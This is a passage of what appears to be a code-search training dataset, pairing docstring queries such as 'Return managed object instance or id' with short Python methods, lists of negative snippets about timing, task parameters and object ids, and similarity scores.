self.acquire_system_time()\n break\n return timestamp", "def getTimes():", "def getTimes():", "def getTimes():", "def actual_time():\n return _time.time()", "def initialTime(self):\n return self.params['t0']", "def compute_time_step():\n\n dt = Hydro.compute_time_step()\n\n return dt", "def time(self):\n raise NotImplementedError()", "def init_time():\r\n\tstarttime = time.time()\r\n\treturn starttime # return the start time\r", "def next_job_run(self):\n return self._data.get('next_job_run')", "def next_run(self):\n for run in self._runs:\n # Because the runs are ordered, look for the first run where\n # stop_time is in the future.\n if run.is_next_run(self._now):\n return run\n # If we arrive here, no next run (today).\n return None", "def next_run_date(self):\n return (\n datetime.combine(self.start_date, datetime.min.time(), tzinfo=pytz.UTC)\n if self.start_date and self.start_date > date.today()\n else None\n )", "def next_run_date(self):\n return (\n datetime.combine(self.start_date, datetime.min.time(), tzinfo=pytz.UTC)\n if self.start_date and self.start_date > date.today()\n else None\n )", "def getCurrentSimulationTime(self):\r\n raise NotImplementedError()", "def cron(self):\n return", "def time(self) -> int:\n pass", "def returnGlobalTimer(self):\n self.globalTime = (time.time() - self.globalStartRef) + self.addedTime #Reports time in minutes, addedTime is for population reboot.\n return self.globalTime/ 60.0", "def _calculate_runtime(self):\n lines = self.file_dic['output'].splitlines()\n start_time = datetime.strptime(lines[0].strip(), self.timestring_format)\n fin_time = datetime.strptime(lines[-1].strip(), self.timestring_format)\n dif = fin_time - start_time\n self.date = fin_time.strftime('%d %b %Y')\n self.runtime = dif.total_seconds()", "def get_time(cls):\n now = rospy.Time.now()\n return now.secs + now.nsecs*(10**-9) # time in seconds", "def lr_scheduler(self, lr_init, global_step):\n pass", "def realtime():\n return timemodule.time()", "def get_exec_time(self):\n return self._exec_time", "def get_nightly_start_time():\n return 14 # 2PM local Tucson time", "def _start_launch_time(self, launched_event):\n if launched_event:\n interval = Interval(0, launched_event.timestamp)\n return self._trace.cpu.task_intervals(task=launched_event.task,\n interval = interval)[0].interval.start", "def step(self):\n\n e = self.event_queue.get()\n self.current_time = e.time\n component = e.component\n component.output(self.current_time)\n component.input(self.current_time)\n component.fire()\n\n self.event_queue.put(VirtualTimeScheduler.Event(self.current_time + component.interval, component))\n\n return self.current_time", "def getStartTime(self):\n assert not self.isWaitingToStart(), \"Too early to tell: %s\" % self\n return \"%s\" % self.__rawInfo.startTime", "def get_time(self):\n return self.run_command('get_time')[0]", "def run_hour(self) -> int:\n return self.timestamp.hour", "def _inst_run(self):\r\n self._inst_get_img_info_from_db()\r\n print(\"run method: \", time.ctime())\r\n th = threading.Timer(\r\n 10,\r\n self._inst_run\r\n )\r\n th.start()", "def get_task_time(self, task):\n task.task_time = TASK_TYPES[task.task_type]\n print(\"Fetched task time\")", "def get_real_time(self):\n \n import time\n return time.clock()", "def schedule(self):\r\n n = self.next()\r\n if n is not None:\r\n if self.clock:\r\n self.cl = self.clock.callLater(n, self.run)\r\n else:\r\n self.cl = core.call_later(n, self.run)\r\n else:\r\n self.cl = None", "def get_next_known_start_time(self, current_time):\n raise NotImplementedError()", "def _next_update_time(self, seconds=10):\n now = get_aware_utc_now()\n next_update_time = now + datetime.timedelta(\n seconds=seconds)\n return next_update_time", "def run_date(self) -> datetime.date:\n return self.timestamp.date()", "def getSimulationTime(self):\r\n raise NotImplementedError()", "def current_time(cls) -> float:", "def update_time(self):\n pass # Do nothing", "def get_next_day(self):\n pass", "def getStartTime(self):\n raise NotImplementedError", "def find_tim(self):\n start_max = 0\n finish_max = 0\n op_mode = self.op_number + ',' + self.mode_number\n for resource in self.resources:\n end_time = resource.usage[op_mode][\"start_time\"] + resource.usage[op_mode][\"duration\"]\n if end_time > finish_max:\n finish_max = end_time\n start_max = resource.usage[op_mode][\"start_time\"]\n self.tim = finish_max\n self.sim = start_max", "def run_single(self):\n self.run_sim_time(1)", "def start(self):\r\n self.start_time = time.time()", "def __call__(self):\n return self.timer()", "def time(self):\n return self._clock() - self._starttime", "def time(self):\n return self._begin", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def _get_scheduler(self):\n return self.__scheduler", "def __nextRun(self, t1, t2):\n if self.t1==t1:\n # rerun from t1\n if self.t2!=t2:\n raise Exception(\"bad t2 (%f!=%f)\" % (t2, self.t2)) \n \n loader = fac.FacManager(self.metafor)\n nt = loader.lookForFile(self.nbFacs) #(0)\n loader.eraseAllFrom(nt)\n self.runOK = self.metafor.getTimeIntegration().restart(nt)\n else:\n # new time step\n tsm = self.metafor.getTimeStepManager()\n dt=t2-t1\n dtmax=dt\n tsm.setNextTime(t2, 1, dtmax) \n \n loader = fac.FacManager(self.metafor)\n nt1 = loader.lookForFile(self.nbFacs) #(0)\n nt2 = loader.lookForFile(self.nbFacs+1) #(1)\n if not self.saveAllFacs:\n loader.erase(nt1) # delete first fac\n self.runOK = self.metafor.getTimeIntegration().restart(nt2)\n if self.saveAllFacs:\n self.nbFacs+=1", "def __time(self):\n return time.time()", "def real_time(self):\n try:\n # TODO: Update for resuming runs\n with open(path.join(self.run_dir, \"TIMINGS\", \"timings.001\"), \"r\") as f:\n text = f.read()\n r = re.match(r\" Total time for loop was(?: *)(.*?)(?: *)seconds\", text, re.DOTALL + re.MULTILINE)\n if not r:\n logger.warning(\"Bad format in timings file. The real time could not be read.\")\n return float(\"nan\")\n else:\n return float(r.group(1))\n except FileNotFoundError:\n return float(\"nan\")", "def exec_time_processor(self):\n with open(join(self.logs_dir, \"clock_time.dat\"), 'w') as fh:\n fh.write(\"Time ExecutionTime ClockTime\\n\")\n while True:\n rexp = (yield)\n fh.write(self.time_str + \"\\t\" +\n \"\\t\".join(x for x in rexp.groups()) + \"\\n\")\n self._tick = True", "def gettime(self):\n return self.t", "def runtime(self):\n return (self.time - self.start).total_seconds()" ]
[ "0.777297", "0.777297", "0.6952469", "0.6825533", "0.67416143", "0.6597113", "0.6557749", "0.65416026", "0.65218025", "0.65074617", "0.64740384", "0.64740384", "0.6465585", "0.64539963", "0.6424806", "0.64134806", "0.638315", "0.6380247", "0.63793695", "0.63596106", "0.63256323", "0.6294104", "0.6291601", "0.62844247", "0.62825316", "0.627319", "0.6251894", "0.62510294", "0.6235922", "0.6197435", "0.6196869", "0.619148", "0.61813873", "0.61743236", "0.6170199", "0.6167948", "0.6158182", "0.6141629", "0.61368316", "0.6134549", "0.6131733", "0.6129247", "0.6129247", "0.6129247", "0.6110128", "0.6078869", "0.6074122", "0.60596746", "0.6053864", "0.604987", "0.6048813", "0.6048377", "0.6048377", "0.60474765", "0.60465837", "0.6041438", "0.6038686", "0.6036047", "0.6035137", "0.6013527", "0.6011462", "0.6011001", "0.6004073", "0.60026836", "0.5998367", "0.59974974", "0.59967726", "0.5991745", "0.59893143", "0.59863544", "0.5977296", "0.5968897", "0.59614336", "0.5959509", "0.59594756", "0.59585106", "0.5957449", "0.5955391", "0.59519356", "0.59452915", "0.593553", "0.5930359", "0.5925394", "0.5923505", "0.5920914", "0.591641", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.591346", "0.59104764", "0.59045833", "0.58981895", "0.5897606", "0.58929044", "0.5888942" ]
0.0
-1
Return managed object instance or id (applicable only when map_task is not None)
def get_managed_object(self): return self.key
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def managed_object_id(self):\n o = self._data[\"managed_object\"]\n if type(o) in (int, long):\n return o\n return o.id", "def _get_instance_id(self):\n return self.__instance_id", "def object_id(self) -> Optional[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(o):\n return id(o)", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"object_id\")", "def objectid_for(obj_or_path_tuple):", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def _get_id(self):\n return self.__id", "def getid(obj):\n try:\n return obj.id\n except AttributeError:\n return obj", "def _task_info_get(context, task_id, session=None):\n session = session or get_session()\n query = session.query(models.TaskInfo)\n query = query.filter_by(task_id=task_id)\n try:\n task_info_ref = query.one()\n except sa_orm.exc.NoResultFound:\n LOG.debug(\"TaskInfo was not found for task with id %(task_id)s\",\n {'task_id': task_id})\n task_info_ref = None\n\n return task_info_ref", "def get_instance(self, name):\n return self.store.instance.id", "def getid(obj):\n\n try:\n return obj.id\n except AttributeError:\n return obj", "def _retrieve_object_id(obj: Optional[Union[\"Base\", str]]) -> Optional[str]:\n # Check whether the obj is an object of any subclass of Base, or uuid type\n from pykechain.models import Base\n\n if issubclass(type(obj), Base):\n return obj.id\n elif isinstance(obj, str) and is_uuid(obj):\n return obj\n elif isinstance(obj, type(None)):\n return None\n else:\n raise IllegalArgumentError(\n \"When adding the widget, obj must be an instance of `Base` or an object id. \"\n \"Type is: {}\".format(type(obj))\n )", "def get_from_object_or_data(self, name):\n if self.instance and getattr(self.instance, name):\n return getattr(self.instance, name).id\n else:\n value = self.initial.get(name, self.data.get(name, None))\n if value:\n if isinstance(value, Story):\n return value.id\n else:\n return int(value)\n\n return None", "def object_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"object_id\")", "def object_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"object_id\")", "def helper_get_task_or_default(self):\n task_id = self.helper_retrieve_last_request_get_dict_key_val_index_zero_or_return_none(\"taskid\")\n alt_task_store_name = self.helper_retrieve_last_request_get_dict_key_val_index_zero_or_return_none(\"alt_task_store_name\")\n used_task_store = self.task_store\n # don't want to use sth like globals.get(alt_task_store) so that only approved stores can be used\n if alt_task_store_name == \"task_store_trash\":\n used_task_store = self.task_store_trash\n try:\n task = used_task_store.store_dict_id[task_id]\n except Exception as exc:\n # task_id is either None or it is not in store_dict_id\n util.dbgprint(\"exception in helper_get_task_or_default, semi-expected {}\".format(str(exc)))\n self.error_msg_queue_list.append(\"Couldn't retrieve requested note.\")\n return False, 0, 0, self.page_list_notes(no_history=True)\n return True, task_id, task, \"\"", "def id(obj):\n return obj", "def get_object(id):", "def get_object_id(resource):\n if hasattr(resource, \"object_id\"):\n return int(resource.object_id)\n\n return int(resource.id)", "def _get_id(self):\n return self.id", "def _get_marker_instance(ctx, marker):\n\n try:\n im = objects.InstanceMapping.get_by_instance_uuid(ctx, marker)\n except exception.InstanceMappingNotFound:\n raise exception.MarkerNotFound(marker=marker)\n\n elevated = ctx.elevated(read_deleted='yes')\n with context.target_cell(elevated, im.cell_mapping) as cctx:\n try:\n db_inst = db.instance_get_by_uuid(cctx, marker,\n columns_to_join=[])\n except exception.InstanceNotFound:\n db_inst = None\n if not db_inst:\n raise exception.MarkerNotFound(marker=marker)\n return db_inst", "def get_instance_id(self):\n return self.instance_id", "def getid(obj):\n\n # Try to return the object's UUID first, if we have a UUID.\n try:\n if obj.uuid:\n return obj.uuid\n except AttributeError:\n pass\n try:\n return obj.id\n except AttributeError:\n return obj", "def _get_task_id_from_xmodule_args(xmodule_instance_args):\r\n return xmodule_instance_args.get('task_id', UNKNOWN_TASK_ID) if xmodule_instance_args is not None else UNKNOWN_TASK_ID", "def identity(self):\n return self.id", "def object_id(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"object_id\")", "def object_for(objectid):", "def _get_task(self, task_id):\n if not task_id:\n return None\n task = objects.Transaction.get_by_uid(task_id, fail_if_not_found=False)\n if task and task.cluster_id == self.cluster.id:\n return task\n return False", "def sop_instance_uid(self) -> Optional[str]:\n return self._instance_uid", "def get_id(obj):\n\n id = callable(obj.id) and obj.id() or obj.id\n assert obj.getId() == id, \"expected identical ids: '%s' != '%s'\" \\\n % (obj.getId(), id)\n return id", "def get_object_id(self, key):\n try:\n return self.key_object[key]\n except KeyError:\n return None", "def get_objective_id(self):\n return Id(self._my_map['objectiveId'])", "def get_pk(self):\n return getattr(self, self.get_pk_name(), None)", "def get_objectID(self):\n return self.resource.uuid", "def get_object(self, queryset=None):\n obj = super().get_object()\n pk_lookup, dataid_lookup = self.lookup_fields\n form_pk = self.kwargs.get(pk_lookup)\n dataid = self.kwargs.get(dataid_lookup)\n\n if form_pk is not None and dataid is not None:\n try:\n int(dataid)\n except ValueError as e:\n raise ParseError(_(f\"Invalid dataid {dataid}\")) from e\n\n if not obj.is_merged_dataset:\n obj = get_object_or_404(\n Instance, pk=dataid, xform__pk=form_pk, deleted_at__isnull=True\n )\n else:\n xforms = obj.mergedxform.xforms.filter(deleted_at__isnull=True)\n pks = list(xforms.values_list(\"pk\", flat=True))\n\n obj = get_object_or_404(\n Instance, pk=dataid, xform_id__in=pks, deleted_at__isnull=True\n )\n\n return obj", "def get_id(self) -> Optional[str]:\n return self.id_", "def object_pk(self):\n\n if self._wrapped not in (None, empty):\n return str(self._wrapped.pk)\n\n if '_object_pk' in self.__dict__:\n return self.__dict__['_object_pk']\n\n identifier = self._get_identifier()\n if identifier:\n # noinspection PyBroadException\n try:\n object_pk = identifier.split('.', 2)[-1]\n if object_pk == 'None':\n object_pk = None\n self.__dict__['_object_pk'] = object_pk\n return object_pk\n except Exception:\n pass\n\n raise AttributeError()", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def get_id(self):\n pass", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"instance_id\")", "def get_objectID(self):\n return self.collection.uuid", "def get_custom_object_id():\n worker = ray.worker.global_worker\n object_id = ray._raylet.compute_put_id(worker.current_task_id,\n worker.task_context.put_index)\n worker.task_context.put_index += 1\n return object_id", "def task(self) -> base_model.BaseTask:\n return self._task", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def instance_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance_id\")", "def _create_instance(**kwargs):\n ctxt = context.get_admin_context()\n return db.instance_create(ctxt, _create_instance_dict(**kwargs))['id']", "def _object_get(self, pk):\n try:\n return self.model.objects.get(pk=pk)\n except self.model.DoesNotExist:\n raise DoesNotExist(self.model.__name__.lower(), primary_key=pk)", "def get_task(self, id):\n\n collection = self._get_collection()\n\n item = collection.find_one({\"_id\": ObjectId(id)})\n\n if item:\n return _mongo_item_to_task(item)\n else:\n return None", "def getId(self):\n # XXX-Aurel : this must be based on the GID definition\n # As GID in TioSafe case is unique, it must be used to get\n # the last ID of an inserted object (usefull for cases where\n # transactionnal operation is not provided like with prestashop)\n #raise ValueError, self.last_id\n return LastIdBrain.getId(self)", "def get_object(self):\n if getattr(self, 'current_instance', None):\n ret = self.current_instance\n else:\n ret = super().get_object()\n return ret", "def get_module_task_instance_id(task_instances):\n for id in task_instances:\n if task_instances[id] == 'module_node':\n return id\n return None", "def single_sign_on_managed_application_instance_id(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"single_sign_on_managed_application_instance_id\")" ]
[ "0.6440617", "0.6409251", "0.62016565", "0.62016565", "0.62016565", "0.6111818", "0.60688394", "0.60688394", "0.60688394", "0.60688394", "0.60688394", "0.60688394", "0.5931027", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.59163266", "0.5880694", "0.5842702", "0.58404994", "0.58098906", "0.5780218", "0.56764966", "0.5667065", "0.5667065", "0.56169796", "0.5605892", "0.56017953", "0.55892986", "0.5574743", "0.5573595", "0.5563259", "0.5549589", "0.5549122", "0.55480087", "0.55343676", "0.55276424", "0.55276173", "0.55274343", "0.55145895", "0.5513257", "0.5481022", "0.5469212", "0.54655623", "0.54630154", "0.54597634", "0.5459083", "0.5448529", "0.5448529", "0.5448529", "0.5448529", "0.54458207", "0.54458207", "0.54458207", "0.54351", "0.54297596", "0.5417569", "0.5417013", "0.5417013", "0.5417013", "0.5417013", "0.54102015", "0.54036796", "0.54030734", "0.53961223", "0.5391137", "0.5380181", "0.5372297" ]
0.6038846
12
Return dict containing job's MRT params (applicable only when map_task is not None)
def get_map_task_params(self): return {}
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_powermax_job_parameters():\n return dict(\n job_id=dict(type='str', required=True)\n )", "def construct_job_params(self, hook: Any) -> dict[Any, Any | None]:\n missing_params = self.required_params - set(self.job_params)\n if missing_params:\n raise AirflowException(f\"Missing the following required job_params: {', '.join(missing_params)}\")\n params = {}\n for prm in self.job_params:\n if prm in self.lookups:\n v = self._api_lookup(param=prm, hook=hook)\n params[prm] = v\n else:\n params[prm] = self.job_params[prm]\n return params", "def make_mapper_task_conf(self, taskid):\n return {\n 'jobid': self.id,\n 'taskid': taskid,\n 'mapper': self.mapper,\n 'cnt_reducers': self.cnt_reducers,\n 'input': map_input(self.id, taskid)\n }", "def _kwargs(self):\n dict = DAG._kwargs(self) \n if (self.job): \n dict[\"inputpaths\"] = self.job.inputpaths\n dict[\"outputpath\"] = self.job.outputpath\n dict[\"job\"] = \"%s()\" % self.job.__class__.__name__\n return dict", "def generate_template_dict(self):\n # Get the existing parameters\n params = super().generate_template_dict()\n\n # Add our custom parameters\n params['job_parameter_file'] = self.job_parameter_file\n params['job_output_directory'] = self.job_output_directory\n\n # Return the updated params\n return params", "def task_properties(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"task_properties\")", "def get_job_dict(self, selector):\n pass", "def accepted_params(self):\n return self.ptm.current_luiti_visualiser_env[\"additional_task_parameters\"]", "def get_params(self):\n return {'threshold': self.threshold,\n 'subsample': self.subsample,\n 'estimator': self.estimator,\n 'n_folds': self.n_folds,\n 'stratify': self.stratify,\n 'random_state': self.random_state,\n 'n_jobs': self.n_jobs}", "def get_params(self):\n params = {}\n for step in self.steps:\n params[step[0]] = step[1].get_params()\n return params", "def _get_task_args():\n task_name = FLAGS.task\n task_args = collections.OrderedDict()\n\n if task_name in TASK_FLAGS:\n task_flag_list = TASK_FLAGS[task_name]\n task_flag_dict = utils_impl.lookup_flag_values(task_flag_list)\n task_flag_prefix = TASK_FLAG_PREFIXES[task_name]\n for (key, value) in task_flag_dict.items():\n if key.startswith(task_flag_prefix):\n key = key[len(task_flag_prefix):].lstrip('_-')\n task_args[key] = value\n return task_args", "def Params(cls):\n p = super().Params()\n p.Define('train_task', None, 'Underlying task')\n p.Define('decode_task', None, 'Underlying task')\n p.Define('train_dataset_name', None, '')\n p.Define('decode_dataset_name', None, '')\n p.Define('train_steps_per_loop', 0, '')\n p.Define('decode_steps_per_loop', 0, '')\n return p", "def _get_time_params(self, cfg):\n for step_name in PipelineConfig.steps:\n params = dict()\n step_cfg = cfg.get(step_name)\n pipe_type = step_cfg.pipe_step.type\n params['pipe_type'] = pipe_type\n if not cfg[step_name].get('trainer', None):\n continue\n params['epochs'] = cfg[step_name].trainer.epochs\n self.params_dict[step_name] = params", "def test_task_params(self, task_mock):\n from sosbeacon.event.message import get_group_broadcast_task\n\n group_key = Mock()\n group_key.urlsafe.return_value = \"AGROUPKEY\"\n\n event_key = Mock()\n event_key.urlsafe.return_value = \"SOMEEVENTKEY\"\n\n message_key = Mock()\n message_key.urlsafe.return_value = \"SOMEMESSAGEKEY\"\n\n batch_id = \"THEBATCHID\"\n iteration = 19\n\n get_group_broadcast_task(\n group_key, event_key, message_key, batch_id, iteration)\n\n check_params = {\n 'group': 'AGROUPKEY',\n 'event': 'SOMEEVENTKEY',\n 'message': 'SOMEMESSAGEKEY',\n 'batch': 'THEBATCHID',\n 'cursor': '',\n 'iter': 19\n }\n self.assertEqual(check_params, task_mock.call_args[1]['params'])", "def gen_task_item(self) -> Dict[str, Any]:\n return {}", "def _get_params_ranges(task: str,) -> Dict[str, Any]:\n params_file = os.path.join(\n os.path.dirname(__file__), \"params\", \"xgboost.yml\"\n )\n params = utils.read_yaml(params_file)\n\n if \"regression\" in task.lower():\n params.update({\"objective\": \"reg:squarederror\"})\n return params\n if \"binary\" in task.lower():\n params.update({\"objective\": \"binary:logistic\"})\n return params\n raise ValueError(f\"{task} is not a supported task.\")", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n transition_name_v = task_list_fields.get('transition_name')\n tr_name = self.get_param_value('transition_name',\n qubit=qb.name,\n default=transition_name_v[1])\n task['transition_name'] = tr_name\n\n value_params = {'v_low': None, 'v_high': None, 'pts': None}\n # The information about the custom parameters above could be\n # Saved somewhere else to generalize all wrappers\n\n default = self.get_param_value(f'default_{tr_name}_amp180',\n qubit=qb.name)\n current = qb.parameters[f'{tr_name}_amp180']()\n max = self.get_param_value('max_drive_amp', qubit=qb.name)\n n = self.get_param_value('n', qubit=qb.name)\n\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n if isinstance(value, str):\n value = eval(\n value.format(current=current,\n max=max,\n default=default,\n n=n))\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # Get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(value_params['v_low'],\n value_params['v_high'],\n value_params['pts'])\n task['sweep_points'] = SweepPoints()\n task['sweep_points'].add_sweep_parameter(values=values,\n **sweep_points_kws)\n qb_v = task_list_fields.get('qb', None)\n if qb_v is not None:\n task['qb'] = qb.name\n\n for k, v in task_list_fields.items():\n if k not in task:\n task[k] = self.get_param_value(k,\n qubit=qb.name,\n default=v[1])\n\n task_list.append(task)\n\n kwargs['task_list'] = task_list\n\n kwargs_super = super().parse_settings(requested_kwargs)\n kwargs_super.update(kwargs)\n\n return kwargs_super", "def get_tasks_params(self):\n params = {}\n tasks = []\n\n for cmdparam in self.cmdline.params:\n if \":\" in cmdparam:\n # task:NAME=VALUE:NAME=VALUE:NAME=VALUE\n parts = cmdparam.split(\":\")\n taskparams = {}\n for taskparam in parts[1:]:\n if \"=\" in taskparam:\n (name, value) = taskparam.split(\"=\", 1)\n if name[:1] == \"_\" or name[-1:] == \"_\":\n raise Error(\"Setting special from command line not allowed\")\n taskparams[name] = value\n\n tasks.append((parts[0], taskparams))\n elif \"=\" in cmdparam:\n # NAME=VALUE\n (name, value) = cmdparam.split(\"=\", 1)\n if name[:1] == \"_\" or name[-1:] == \"_\":\n raise Error(\"Setting special _VARIABLES_ from command line not allowed\")\n params[name] = value\n else:\n # taskname\n tasks.append((cmdparam, {}))\n\n return (tasks, params)", "def task_to_dict(task):\n if not isinstance(task, Task):\n return None\n d = {}\n for a in vars(task):\n d[a] = getattr(task, a)\n return d", "def make_reducer_task_conf(self, taskid):\n return {\n 'jobid': self.id,\n 'taskid': taskid,\n 'reducer': self.reducer,\n 'output_dir': self.output_dir,\n 'inputs': [map_output(self.id, i, taskid) for i in \\\n range(self.cnt_mappers)]\n }", "def test_task_params(self, task_mock):\n from sosbeacon.event.message import get_student_broadcast_task\n\n student_key = Mock()\n student_key.urlsafe.return_value = \"ASTUDENTKEY\"\n\n event_key = Mock()\n event_key.urlsafe.return_value = \"ANEVENTKEY\"\n\n message_key = Mock()\n message_key.urlsafe.return_value = \"SOMEMESSAGEKEY\"\n\n batch_id = \"THEBATCHID\"\n\n get_student_broadcast_task(\n student_key, event_key, message_key, batch_id)\n\n check_params = {\n 'student': 'ASTUDENTKEY',\n 'event': 'ANEVENTKEY',\n 'message': 'SOMEMESSAGEKEY',\n 'batch': 'THEBATCHID',\n }\n self.assertEqual(check_params, task_mock.call_args[1]['params'])", "def _default_params(self) -> dict[str, Any]:\n return {\n \"max_tokens\": self.max_tokens,\n \"temperature\": self.temperature,\n \"top_p\": self.top_p,\n \"logprobs\": self.logprobs,\n \"echo\": self.echo,\n \"stop_sequences\": self.stop_sequences,\n \"repeat_penalty\": self.repeat_penalty,\n \"top_k\": self.top_k,\n \"n_threads\": self.n_threads,\n \"n_ctx\": self.n_ctx,\n \"n_gpu_layers\": self.n_gpu_layers,\n \"n_gqa\": self.n_gqa if self.n_gqa else None,\n \"n_parts\": self.n_parts,\n \"seed\": self.seed,\n \"f16_kv\": self.f16_kv,\n \"logits_all\": self.logits_all,\n \"vocab_only\": self.vocab_only,\n \"use_mlock\": self.use_mlock,\n \"n_batch\": self.n_batch,\n \"last_n_tokens_size\": self.last_n_tokens_size,\n \"streaming\": self.streaming,\n }", "def get_tasks(self) -> Dict[str, Any]:\n\n ret = {}\n for k, id in self.required_tasks.items():\n ret[k] = self.storage_socket.get_procedures(id=id)[\"data\"][0]\n\n return ret", "def get_task_params(jeditaskid):\n\n query = {'jeditaskid': jeditaskid}\n taskparams = JediTaskparams.objects.filter(**query).values()\n\n if len(taskparams) > 0:\n taskparams = taskparams[0]['taskparams']\n try:\n taskparams = json.loads(taskparams)\n except ValueError:\n pass\n\n # protection against surrogates\n if 'cliParams' in taskparams:\n taskparams['cliParams'] =taskparams['cliParams'].encode('utf-8', 'replace').decode(\"utf-8\", 'surrogateescape')\n\n return taskparams", "def get_task_worker(self):\r\n start, end = self.get_block()\r\n return {\r\n 'task_id':self.id,\r\n 'finished':self.finished,\r\n 'free_block':(start != end),\r\n 'keyword':self.keyword,\r\n 'chars':self.chars,\r\n 'algorithm':self.algorithm,\r\n 'start_point':start,\r\n 'end_point':end\r\n }", "def get_job(self) -> Union[Dict[Text, Text], CustomJob]:\n pass", "def get_task_parameters_as_string(self):\n\t\treturn call_sdk_function('PrlRunningTask_GetTaskParametersAsString', self.handle)", "def parameters(self) -> dict[str, Any]:\n return {\n \"IrrigationEfficiency\": self._get_textvar_value(\"IrrigationEfficiency\"),\n \"MaskMap\": self._get_textvar_value(\"MaskMap\"),\n \"start_time\": get_time(self.forcing.start_time).strftime(ISO_TIMEFMT),\n \"end_time\": get_time(self.forcing.end_time).strftime(ISO_TIMEFMT),\n }", "def _get_job_defaults():\n\n lines = []\n lines += '[Job]\\n'\n j = Job()\n for cj in j._config_names:\n v = getattr(j, cj)\n lines += '%s = %s\\n' % (cj, v)\n lines += '\\n'\n return lines", "def get_options(self) -> dict:\n assert self.task\n task_options = {\n **self.task.get_task_options(),\n **self.expr.task_expr_options,\n **self.task_options,\n }\n return task_options", "def get_parkey_map(self):\n parkey_map = self.selector.get_parkey_map()\n tpn_values = self.tpn_valid_values\n for key in self.get_extra_parkeys():\n if key in parkey_map and \"CORR\" not in key:\n continue\n parkey_map[key] = tpn_values.get(key, [])\n if key.endswith(\"CORR\"): # and parkey_map[key] == []:\n parkey_map[key] = [\"PERFORM\", \"OMIT\", \"NONE\", \"COMPLETE\", \"UNDEFINED\"]\n return parkey_map", "def parse_settings(self, requested_kwargs):\n kwargs = {}\n task_list = []\n for qb in self.qubits:\n task = {}\n task_list_fields = requested_kwargs['task_list_fields']\n\n value_params = {'t0': None, 'delta_t': None, 'pts': None}\n\n for name, value in value_params.items():\n value = self.get_param_value(name, qubit=qb.name)\n value_params[name] = value\n\n sweep_points_v = task_list_fields.get('sweep_points', None)\n if sweep_points_v is not None:\n # get first dimension (there is only one)\n # TODO: support for more dimensions?\n sweep_points_kws = next(iter(\n self.kw_for_sweep_points.items()))[1]\n values = np.linspace(\n 